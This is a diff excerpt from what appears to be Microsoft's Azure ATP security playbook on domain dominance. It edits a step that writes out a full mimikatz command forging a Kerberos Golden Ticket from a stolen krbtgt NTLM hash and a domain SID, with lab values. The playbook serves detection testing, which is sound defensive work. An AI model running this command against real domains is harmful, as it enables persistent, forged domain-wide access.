MicrosoftDocs/ATADocs/ATPDocs/atp-playbook-domain-dominance.md

 2. Identify and copy the Domain SID highlighted in the above screenshot.

 3. Using **mimikatz**, take the copied Domain SID, along with the stolen “krbtgt” user's NTLM hash to generate the TGT.
-Insert the following text into a cmd.exe as JeffV:
+Insert the following text into a cmd.exe as JeffL:

    ``` cmd
    mimikatz.exe "privilege::debug" "kerberos::golden /domain:contoso.azure /sid:S-1-5-21-2839646386-741382897-445212193 /krbtgt:c96537e5dca507ee7cfdede66d33103e /user:SamiraA /ticket:c:\temp\GTSamiraA_2018-11-28.kirbi /ptt" "exit"